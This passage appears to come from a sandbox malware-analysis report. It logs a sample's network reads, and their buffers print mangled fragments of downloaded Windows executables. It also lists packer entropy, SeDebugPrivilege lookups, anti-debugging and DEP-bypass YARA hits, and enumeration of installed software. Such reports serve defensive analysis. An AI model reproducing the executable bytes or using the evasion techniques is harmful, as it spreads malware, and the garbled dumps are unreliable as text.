åé\_éÜ'éÈéäéJÓélÐéÑé³> éã&éò ééLSé°ùé±é¬: éé>é«ééK&é»\|éiéeé÷]éøwéP~ é¶ÄéééáéÌäéÀ éKéÉdéÃ¡ élóééé-ÝéáéCé½ýéNé2YéÌéöéc_é³éÌ- éí²éVÿéµés$é©¶éOé½'é¡léZé^ié(QéÎéÏ,éXév éceéÍæééÖoéÔÕé^$éÂ} é<ér\|é ^ég é éëëé×_éJév^éU é,×é~é¹éL9é;Jéé;Ué9æé5éµr éCéBÔé¬élé\é+áéIr éãtéßié,Îéóéfé¹éðéÆéøåé¯évxéÔé¼Üé,éÝé&³éysé8õéÁ¯éÓçédéôé±éMÛéãé}ïéUnéçé@é\ýé¶éQ¶éFéÒé3ùé±<é8réîéU éïéôé éEÒé´= ésèélÝérjét(éNé2éY éJBémi éüY é¥é¸´é eé ééßqé¼óé¼Eé{é]é?gé2éÈJé> éAQé Æé@ éà¬ééQéK£ é¢Eéºoéo~ ét'éz2éúé!ëéùié[4éé8ééÃé>3éuàé'éðØééÌäénéØé? request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà dÎ`j@ ½s@Á ¢´ÀØ¯pT@ .textcd `.dataHh@À.idataR j@@.rsrc°À°\|@@.relocp ,@B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁcAó/ / / Vp,¡/ Vp¡,/ Vp+¡/ Ê~+¡/ Ê~,¡/ Vp.¡/ . / Ê~¡Ö/ D~¡/ D~-¡/ Rich/ PELÌbDeà"2¬ÑP@@@C Pà¬Jðb8b@@ .textC02 `.rdataP6@@.dataØ@ð$Î@À.idataò@ ò@@.bsskb` d @À.00cfgÐj@@.reloc¾WàXl@BÌÌÌÌÌé½µé6Né é:é Mé6âé¨ÂéöétDéûD éMGéÉ÷é6éðSé?úéÉäé6^ éÄÓéé6é^é±éÐé_béq]éeLéÜuéÅé3é Jé²géØéVéÞ5é<)éÏéSéfgéìé1é6éÙôé3³éQiéàeé;é^Wé/õ éëêéØÒééÊ¡éÚùéUé56é é[héléÖéðéK écÇéÔséÐééé^úéÈ÷é@fé3né/;é¡;éóé8é1éÌoé¿éÁéèéè¥éNuéÜéÛé Ìé2ÔéÜéµué½Bé¯öé³Véã®éèEé#¼é&ééûXé oééÍ¹éñ é&éÀfé ébéPúéùéÂséaé;\|éñXéÉÞé% éÙ é/ÜéZåéùîéséx{ébéÒéÆI é Qé¸ÿé'é_ß ém¶é0né.yézéÛæéÂæéÝé¯zé\2é ñéÈ}é«ñéh0éò4é¸,é¬ éséÎDéSéãéÛééRpé ·éZùéuõéqzéccéíué éé Ùé\|éçé¢qéã,é©é ¦éÖ$ékOéaÅ é`ée éqk édäéêÜéL<éû²é.Ré\|8é=éÊé\|éKééaébQéeéÏé(ké! é£é%Àé)é4ñé·d ékôé·,é£é;é"Ié é.éÄéÓÐéO{é²éÉé`éo é¥Ãédéöb éG4épébA é éÓTé¸éÎéééÔ)é8ìéÔéèézóéËéséµäéÝéùçé éà8é\"é÷mé,éì¿éäé@ éÞé½wéí énhé-éú+é6béXéüé,é éðéÑéoLé¨Îé- éuéÒ éóékéJéªéë.é~béøé¡§ éb© é¡®é éì2éÝ¹é²Ûé/.é·kéñéVgé éEé@é÷æéæíérÈéR/é'-éÜTéÝ&éËé¸c éqaéKésùéÌòéeTéé]é@ÊéQ,é¡-éLéíéøé{éè.éa±éwéªU é: éQé°éáé¸ëéÕmé¢véÈé\)éniéçMéþ< é¨Z év0é{éÁ8é¶6é-ªé:ôé{&é ¼éäkéâéaéñJé¸ébìé¬¼é¸wéc#ér_ éßhéßmé\|éúréeôéi,é»é&âéøRéïüé¯êéÿBéVMé¾Mé=RéÀéóéóéL éÃé¥ôé×ésåéå4éQéÄé¬éUíé´(é`é(éfµé · éÞ´éÕé_4é³% éðñéö,éîéé9óé#£ é;iéJÕéQéÄ¶ éºBé÷þéØékéêþé éïGéhéÚéÖ_é ;éBèéª'é'XéYÇé!Bé~éé¤é¹àééÊ?é]né/té%·éÆuéléáéòéYé éömé( é¢é$øéO éñ é{éÕéûé¦éH<éøéBé åé\_éÜ'éÈéäéJÓélÐéÑé³> éã&éò ééLSé°ùé±é¬: éé>é«ééK&é»\|éiéeé÷]éøwéP~ é¶ÄéééáéÌäéÀ éKéÉdéÃ¡ élóééé-ÝéáéCé½ýéNé2YéÌéöéc_é³éÌ- éí²éVÿéµés$é©¶éOé½'é¡léZé^ié(QéÎéÏ,éXév éceéÍæééÖoéÔÕé^$éÂ} é<ér\|é ^ég é éëëé×_éJév^éU é,×é~é¹éL9é;Jéé;Ué9æé5éµr éCéBÔé¬élé\é+áéIr éãtéßié,Îéóéfé¹éðéÆéøåé¯évxéÔé¼Üé,éÝé&³éysé8õéÁ¯éÓçédéôé±éMÛéãé}ïéUnéçé@é\ýé¶éQ¶éFéÒé3ùé±<é8réîéU éïéôé éEÒé´= ésèélÝérjét(éNé2éY éJBémi éüY é¥é¸´é eé ééßqé¼óé¼Eé{é]é?gé2éÈJé> éAQé Æé@ éà¬ééQéK£ é¢Eéºoéo~ ét'éz2éúé!ëéùié[4éé8ééÃé>3éuàé'éðØééÌäénéØé? request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 12:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL ïeà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00181400', u'virtual_address': u'0x0000c000', u'entropy': 7.977388169833002, u'name': u'.rsrc', u'virtual_size': u'0x00182000'}

entropy

7.97738816983

description

A section with a high entropy has been found

entropy

0.979345408325

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (8 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 3, 2023, 12:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 12:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 148 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 255 events)

Time & API	Arguments	Status
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000510 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: 7-Zip base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: AddressBook base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Adobe AIR base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Connection Manager base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: EditPlus base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Fontcore base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Google Chrome base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: IE40 base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: IE4Data base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: IEData base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: WIC base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 12:04 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x00000510 key_handle: 0x00000514 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
